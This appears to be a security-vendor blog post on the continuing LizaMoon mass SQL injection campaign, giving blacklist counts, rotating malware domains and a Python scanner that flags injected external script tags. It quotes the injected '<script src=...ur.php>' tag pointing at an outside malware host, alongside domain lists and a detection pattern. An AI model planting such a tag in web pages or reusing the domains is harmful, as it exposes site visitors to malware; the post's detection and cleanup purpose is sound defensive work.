LizaMoon SQL injections (ur.php) – Now vcvsta.com, asweds.com, etc.

A couple of months ago, the LizaMoon malware / mass SQL injection was getting a lot of news coverage, with reports that it could be affecting hundreds of thousands of sites.

The media has mostly forgotten about it, but we kept tracking those attacks, and they are continuing at full force, just using different domain names.

For example, the domain http://vcvsta.com/ur.php caused 1.5k sites to get blacklisted by Google:

Yes, this site has hosted malicious software over the past 90 days. It infected 1583 domain(s), including chamc.co.kr/, mugunghwa.or.kr/, humour.com/.

Meanwhile, http://statsl.com/ur.php caused more than 600 sites to get blacklisted, and searching Google for http://asweds.com/ur.php on ASP sites returns more than 2k pages.

Yes, this site has hosted malicious software over the past 90 days. It infected 622 domain(s), including rozanaspokesman.com/, 89fm.com.br/, phhc.co.kr/.

So what is going on? The attacks are still at full force, but they use different domain names to distribute the malware (always registered by jamesnorthone@hotmailbox.com). A hacked site will have the following code (or something very similar) added to its pages:

<script src=http://asweds.com/ur.php>..
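Because the domains rotate while the ur.php path stays the same in the injected URLs shown in this post, a check on your own pages can key on the path rather than the host. The following is an added example, not code from the original post or from our scanner; the function names, the sample page and the cdn.example.com allowlist entry are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

CAMPAIGN_PATH = "/ur.php"  # path shared by the injected URLs shown in this post


class ScriptSrcCollector(HTMLParser):
    """Records (line, src) for each <script src=...>, quoted or unquoted."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":  # HTMLParser lower-cases tag and attribute names
            src = dict(attrs).get("src")
            if src:
                self.sources.append((self.getpos()[0], src.strip()))


def find_injected_scripts(html, allowed_hosts=()):
    """Return [(line, src, verdict)] for external scripts worth a look."""
    allowed = {h.lower() for h in allowed_hosts}
    collector = ScriptSrcCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for line, src in collector.sources:
        url = urlsplit(src)
        host = (url.hostname or "").lower()
        if not host:
            continue  # relative URL: served by the site itself
        if url.path.lower().endswith(CAMPAIGN_PATH):
            findings.append((line, src, "campaign"))  # matches on any host
        elif host not in allowed:
            findings.append((line, src, "review"))  # unknown external host
    return findings


# Constructed sample page (closing tag assumed); cdn.example.com is a placeholder.
SAMPLE_PAGE = """<html><head>
<script src="/js/site.js"></script>
</head><body>
<p>Product description</p><SCRIPT SRC=http://asweds.com/ur.php></SCRIPT>
<script src="https://cdn.example.com/lib.js"></script>
</body></html>"""
```

Run it over rendered pages rather than templates: the tag is injected into database content, so it only shows up in the HTML the site actually serves.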

These are some of the new domains used in this attack:

http://booksolo.com (showing up on hacked sites – seo spam)
http://bookvila.com (showing up on hacked sites – seo spam)
http://booktuba.com (showing up on hacked sites – seo spam)
http://bookavio.com (showing up on these hacked sites – seo spam)
http://booknunu.com (same as above)

And some of the old domains used for these mass SQL injections:

We posted more details on these types of attacks when the first one hit almost a year ago: Mass infection of IIS/ASP sites – robint.us

A good way to check if your site is infected is to use our malware scanner. If you see IIS:4 as the malware code, you know what happened.


If you have any questions or need help cleaning it up, let us know. If you need immediate clean up assistance, visit our Sign Up page.

About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.